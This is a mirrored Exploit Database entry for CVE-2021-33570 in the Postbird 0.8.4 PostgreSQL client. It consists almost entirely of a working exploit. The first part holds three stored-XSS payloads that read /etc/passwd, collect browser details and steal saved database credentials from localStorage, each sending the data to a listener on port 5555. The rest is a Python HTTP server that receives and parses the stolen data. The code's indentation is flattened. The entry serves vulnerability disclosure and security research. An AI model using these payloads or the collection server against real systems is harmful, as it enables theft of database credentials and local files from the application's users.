Postbird 0.8.4 – Javascript Injection

• Exploit Database
• 15 阅读

• 作者： Debshubra Chakraborty
  日期： 2021-05-27
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49910/

• # Exploit Title: Postbird 0.8.4 - Javascript Injection
  # Date: [26 May 2021]
  # Exploit Author: Debshubra Chakraborty
  # Vendor Homepage: https://github.com/paxa/postbird
  # Software Link: https://www.electronjs.org/apps/postbird
  # Version: 0.8.4 
  # Tested on: Linux
  # CVE : CVE-2021-33570
  
  """
  XSS Payload
  <img src="https://www.exploit-db.com/exploits/49910/" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?xss='+JSON.stringify(navigator.appVersion), true);xhttp.send();">
  
  LFI Payload
  <img src="https://www.exploit-db.com/exploits/49910/" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'file:///etc/passwd', false);xhttp.send();var res = xhttp.response;xhttp.open('GET', 'http://127.0.0.1 :5555/?file='+JSON.stringify(res), true);xhttp.send();">
  
  PostgreSQL Password Stealing Payload
  <img src="https://www.exploit-db.com/exploits/49910/" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">
  
  """
  
  from http.server import BaseHTTPRequestHandler, HTTPServer
  import urllib.parse
  import re
  
  hostName = '0.0.0.0'
  serverPort = 5555
  
  class MyServer(BaseHTTPRequestHandler):
  def do_GET(self):
  self.send_response(200)
  parse(urllib.parse.unquote(self.requestline))
  
  def log_message(self, format, *args):
  return 
  
  
  def parse(data):
  expression = re.search('\S+=', data)
  attr = expression.group()
  
  if attr[2:len(attr)-1] == 'file':
  data = data[12:len(data)-11]
  data = data.rsplit('\\n')
  print(f'\n[+] File received from LFI: \n\n')
  for output in data:
  print(output)
  
  elif attr[2:len(attr)-1] == 'xss':
  data = data[11:len(data)-10]
  print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
  
  elif attr[2:len(attr)-1] == 'credentials':
  pos = re.search('{"\S+:', data)
  data = data[pos.start():len(data)-11]
  for i in range(2, len(data), 1):
  if data[i] == '"':
  pos = i
  break
  
  host = data[2:pos]
  data = data[14:]
  data = data.rsplit(',')
  print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
  for output in data:
  print(output)
  
  else:
  print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')
  
  
  def main():
  global hostName, serverPort
  webServer = HTTPServer((hostName, serverPort), MyServer)
  print("Server started http://%s:%s" % (hostName, serverPort))
  
  try:
  webServer.serve_forever()
  
  except KeyboardInterrupt:
  pass
  
  webServer.server_close()
  print("\nServer stopped.")
  
  
  if __name__ == "__main__":
  main()